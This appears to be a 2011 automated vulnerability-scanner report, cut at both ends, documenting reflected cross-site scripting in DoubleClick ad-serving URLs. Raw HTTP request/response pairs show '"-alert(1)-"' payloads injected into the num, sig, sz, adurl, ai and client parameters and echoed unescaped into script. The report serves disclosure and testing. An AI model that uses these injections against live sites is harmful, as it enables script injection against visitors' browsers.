http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7035 Date: Sat, 26 Mar 2011 13:14:48 GMT Vary: Accept-Encoding Expires: Sat, 26 Mar 2011 13:14:48 GMT Cache-Control: private, x-gzip-ok=""
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... BfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912e67df"-alert(1)-"af922d3d5bf&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C151S512N0B2A1D687E0000V100%26promo%3DBCXXX03936"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a362b"-alert(1)-"c0a292ff252 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1a362b"-alert(1)-"c0a292ff252&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=;ord=403758047? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7004 Date: Sat, 26 Mar 2011 13:14:28 GMT Vary: Accept-Encoding Expires: Sat, 26 Mar 2011 13:14:28 GMT Cache-Control: private, x-gzip-ok=""
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... qLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1a362b"-alert(1)-"c0a292ff252&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP99C519S512N0B2A1D38E0000V109"); var fscUrl = url; var fscUrlClickT ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c075c"-alert(1)-"98c9a8f876d was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QAc075c"-alert(1)-"98c9a8f876d&client=ca-pub-4063878933780912&adurl=;ord=403758047? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7074 Date: Sat, 26 Mar 2011 13:14:38 GMT Vary: Accept-Encoding Expires: Sat, 26 Mar 2011 13:14:38 GMT Cache-Control: private, x-gzip-ok=""
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... Bo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QAc075c"-alert(1)-"98c9a8f876d&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C151S512N0B2A1D687E0000V102%26promo%3DBCXXX04225"); var fscUrl = url; var fscUrlClickTagFound = false; ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1e51"-alert(1)-"b2b22d2d3e9 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=lc1e51"-alert(1)-"b2b22d2d3e9&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=;ord=403758047? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7040 Date: Sat, 26 Mar 2011 13:14:07 GMT Vary: Accept-Encoding Expires: Sat, 26 Mar 2011 13:14:07 GMT Cache-Control: private, x-gzip-ok=""
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad6/f/18b/%2a/b%3B234428571%3B0-0%3B0%3B50265527%3B3454-728/90%3B38431379/38449136/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lc1e51"-alert(1)-"b2b22d2d3e9&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccbd9"-alert(1)-"b691060660c was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=ccbd9"-alert(1)-"b691060660c HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A// User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6855 Cache-Control: no-cache Pragma: no-cache Date: Fri, 25 Mar 2011 19:17:44 GMT Expires: Fri, 25 Mar 2011 19:17:44 GMT
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... zovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=ccbd9"-alert(1)-"b691060660chttp://learning.capella.edu/banners.aspx?revkey=151364"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ead3"-alert(1)-"0df83226a7e was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ8ead3"-alert(1)-"0df83226a7e&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=;ord=1246807419? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A// User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6885 Date: Fri, 25 Mar 2011 19:14:32 GMT Vary: Accept-Encoding Expires: Fri, 25 Mar 2011 19:14:32 GMT Cache-Control: private, x-gzip-ok=""
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... nAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ8ead3"-alert(1)-"0df83226a7e&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151364"); var fscUrl = url; var fscUrlClickTagFound = fals ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93684"-alert(1)-"04063d9d42c was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-406387893378091293684"-alert(1)-"04063d9d42c&adurl=;ord=1246807419? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A// User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6885 Date: Fri, 25 Mar 2011 19:16:56 GMT Vary: Accept-Encoding Expires: Fri, 25 Mar 2011 19:16:56 GMT Cache-Control: private, x-gzip-ok=""
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... U6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-406387893378091293684"-alert(1)-"04063d9d42c&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151364"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78ad2"-alert(1)-"0cffce0ff89 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=178ad2"-alert(1)-"0cffce0ff89&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=;ord=1246807419? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A// User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6885 Date: Fri, 25 Mar 2011 19:15:20 GMT Vary: Accept-Encoding Expires: Fri, 25 Mar 2011 19:15:20 GMT Cache-Control: private, x-gzip-ok=""
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... wMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=178ad2"-alert(1)-"0cffce0ff89&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151364"); var fscUrl = url; var fscUrlClickTagFound = false; va ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13934"-alert(1)-"2f40d37216e was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
